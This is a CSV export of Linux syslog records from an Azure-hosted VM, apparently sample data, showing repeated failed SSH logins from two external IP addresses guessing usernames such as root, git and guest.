+4952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:37,UbuntuDevEnv,2019-06-26 15:08:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,17861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+4953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:39,UbuntuDevEnv,2019-06-26 15:08:38,auth,UbuntuDevEnv,info,Failed password for invalid user norbert from 192.241.213.168 port 44996 ssh2,17861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,norbert,192.241.213.1,44996,,
+4954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:39,UbuntuDevEnv,2019-06-26 15:08:38,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 44996:11: Bye Bye [preauth],17861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,44996,,
+4955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:39,UbuntuDevEnv,2019-06-26 15:08:38,auth,UbuntuDevEnv,info,Disconnected from invalid user norbert 192.241.213.168 port 44996 [preauth],17861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,norbert,192.241.213.1,44996,,
+4956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:39,UbuntuDevEnv,2019-06-26 15:08:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40  user=root,17868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,43.229.134.4,,0,
+4957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:41,UbuntuDevEnv,2019-06-26 15:08:41,auth,UbuntuDevEnv,info,Failed password for root from 43.229.134.40 port 43822 ssh2,17868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,43822,,
+4958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:42,UbuntuDevEnv,2019-06-26 15:08:41,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 43822:11: Bye Bye [preauth],17868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,43822,,
+4959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:42,UbuntuDevEnv,2019-06-26 15:08:41,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 43.229.134.40 port 43822 [preauth],17868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,43.229.134.4,43822,,
+4960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:45,UbuntuDevEnv,2019-06-26 15:08:44,auth,UbuntuDevEnv,info,Invalid user deploy4 from 43.229.134.40 port 44200,17897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy4,43.229.134.4,44200,,
+4961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:45,UbuntuDevEnv,2019-06-26 15:08:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,17897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+4962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:45,UbuntuDevEnv,2019-06-26 15:08:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:47,UbuntuDevEnv,2019-06-26 15:08:47,auth,UbuntuDevEnv,info,Failed password for invalid user deploy4 from 43.229.134.40 port 44200 ssh2,17897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy4,43.229.134.4,44200,,
+4964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:48,UbuntuDevEnv,2019-06-26 15:08:47,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy4 43.229.134.40 port 44200 [preauth],17897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy4,43.229.134.4,44200,,
+4965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:48,UbuntuDevEnv,2019-06-26 15:08:47,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 44200:11: Bye Bye [preauth],17897,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,44200,,
+4966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:51,UbuntuDevEnv,2019-06-26 15:08:51,auth,UbuntuDevEnv,info,Invalid user training from 43.229.134.40 port 44574,17920,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,training,43.229.134.4,44574,,
+4967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:51,UbuntuDevEnv,2019-06-26 15:08:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17920,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:51,UbuntuDevEnv,2019-06-26 15:08:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,17920,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+4969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:53,UbuntuDevEnv,2019-06-26 15:08:52,auth,UbuntuDevEnv,info,Failed password for invalid user training from 43.229.134.40 port 44574 ssh2,17920,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,training,43.229.134.4,44574,,
+4970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:53,UbuntuDevEnv,2019-06-26 15:08:52,auth,UbuntuDevEnv,info,Disconnected from invalid user training 43.229.134.40 port 44574 [preauth],17920,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,training,43.229.134.4,44574,,
+4971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:53,UbuntuDevEnv,2019-06-26 15:08:52,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 44574:11: Bye Bye [preauth],17920,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,44574,,
+4972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:57,UbuntuDevEnv,2019-06-26 15:08:56,auth,UbuntuDevEnv,info,Invalid user jasper from 43.229.134.40 port 44948,17938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jasper,43.229.134.4,44948,,
+4973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:57,UbuntuDevEnv,2019-06-26 15:08:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:57,UbuntuDevEnv,2019-06-26 15:08:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,17938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+4975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:59,UbuntuDevEnv,2019-06-26 15:08:59,auth,UbuntuDevEnv,info,Failed password for invalid user jasper from 43.229.134.40 port 44948 ssh2,17938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jasper,43.229.134.4,44948,,
+4976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:00,UbuntuDevEnv,2019-06-26 15:08:59,auth,UbuntuDevEnv,info,Disconnected from invalid user jasper 43.229.134.40 port 44948 [preauth],17938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jasper,43.229.134.4,44948,,
+4977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:00,UbuntuDevEnv,2019-06-26 15:08:59,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 44948:11: Bye Bye [preauth],17938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,44948,,
+4978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:03,UbuntuDevEnv,2019-06-26 15:09:02,auth,UbuntuDevEnv,info,Invalid user vinay from 43.229.134.40 port 45324,17958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vinay,43.229.134.4,45324,,
+4979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:03,UbuntuDevEnv,2019-06-26 15:09:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:03,UbuntuDevEnv,2019-06-26 15:09:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,17958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+4981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:05,UbuntuDevEnv,2019-06-26 15:09:04,auth,UbuntuDevEnv,info,Failed password for invalid user vinay from 43.229.134.40 port 45324 ssh2,17958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vinay,43.229.134.4,45324,,
+4982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:05,UbuntuDevEnv,2019-06-26 15:09:05,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 45324:11: Bye Bye [preauth],17958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,45324,,
+4983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:05,UbuntuDevEnv,2019-06-26 15:09:05,auth,UbuntuDevEnv,info,Disconnected from invalid user vinay 43.229.134.40 port 45324 [preauth],17958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vinay,43.229.134.4,45324,,
+4984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:09,UbuntuDevEnv,2019-06-26 15:09:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40  user=test,17984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,43.229.134.4,,0,
+4985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:11,UbuntuDevEnv,2019-06-26 15:09:10,auth,UbuntuDevEnv,info,Failed password for test from 43.229.134.40 port 45698 ssh2,17984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,45698,,
+4986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:11,UbuntuDevEnv,2019-06-26 15:09:11,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 43.229.134.40 port 45698 [preauth],17984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,43.229.134.4,45698,,
+4987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:11,UbuntuDevEnv,2019-06-26 15:09:11,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 45698:11: Bye Bye [preauth],17984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,45698,,
+4988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:15,UbuntuDevEnv,2019-06-26 15:09:15,auth,UbuntuDevEnv,info,Invalid user guest from 43.229.134.40 port 46074,18013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,43.229.134.4,46074,,
+4989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:15,UbuntuDevEnv,2019-06-26 15:09:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+4990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:15,UbuntuDevEnv,2019-06-26 15:09:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:17,UbuntuDevEnv,2019-06-26 15:09:16,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 43.229.134.40 port 46074 ssh2,18013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,43.229.134.4,46074,,
+4992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:17,UbuntuDevEnv,2019-06-26 15:09:17,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 43.229.134.40 port 46074 [preauth],18013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,43.229.134.4,46074,,
+4993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:17,UbuntuDevEnv,2019-06-26 15:09:17,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 46074:11: Bye Bye [preauth],18013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,46074,,
+4994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:21,UbuntuDevEnv,2019-06-26 15:09:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:21,UbuntuDevEnv,2019-06-26 15:09:21,auth,UbuntuDevEnv,info,Invalid user bot2 from 43.229.134.40 port 46448,18036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot2,43.229.134.4,46448,,
+4996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:21,UbuntuDevEnv,2019-06-26 15:09:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+4997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:23,UbuntuDevEnv,2019-06-26 15:09:22,auth,UbuntuDevEnv,info,Failed password for invalid user bot2 from 43.229.134.40 port 46448 ssh2,18036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot2,43.229.134.4,46448,,
+4998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:23,UbuntuDevEnv,2019-06-26 15:09:22,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 46448:11: Bye Bye [preauth],18036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,46448,,
+4999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:23,UbuntuDevEnv,2019-06-26 15:09:22,auth,UbuntuDevEnv,info,Disconnected from invalid user bot2 43.229.134.40 port 46448 [preauth],18036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot2,43.229.134.4,46448,,
+5000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:27,UbuntuDevEnv,2019-06-26 15:09:27,auth,UbuntuDevEnv,info,Invalid user git from 43.229.134.40 port 46824,18057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,43.229.134.4,46824,,
+5001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:27,UbuntuDevEnv,2019-06-26 15:09:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:27,UbuntuDevEnv,2019-06-26 15:09:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:29,UbuntuDevEnv,2019-06-26 15:09:29,auth,UbuntuDevEnv,info,Failed password for invalid user git from 43.229.134.40 port 46824 ssh2,18057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,43.229.134.4,46824,,
+5004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:30,UbuntuDevEnv,2019-06-26 15:09:29,auth,UbuntuDevEnv,info,Disconnected from invalid user git 43.229.134.40 port 46824 [preauth],18057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,43.229.134.4,46824,,
+5005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:30,UbuntuDevEnv,2019-06-26 15:09:29,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 46824:11: Bye Bye [preauth],18057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,46824,,
+5006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:33,UbuntuDevEnv,2019-06-26 15:09:33,auth,UbuntuDevEnv,info,Invalid user cron from 43.229.134.40 port 47196,18075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cron,43.229.134.4,47196,,
+5007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:33,UbuntuDevEnv,2019-06-26 15:09:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:33,UbuntuDevEnv,2019-06-26 15:09:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:35,UbuntuDevEnv,2019-06-26 15:09:34,auth,UbuntuDevEnv,info,Failed password for invalid user cron from 43.229.134.40 port 47196 ssh2,18075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cron,43.229.134.4,47196,,
+5010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:35,UbuntuDevEnv,2019-06-26 15:09:34,auth,UbuntuDevEnv,info,Disconnected from invalid user cron 43.229.134.40 port 47196 [preauth],18075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cron,43.229.134.4,47196,,
+5011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:35,UbuntuDevEnv,2019-06-26 15:09:34,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 47196:11: Bye Bye [preauth],18075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,47196,,
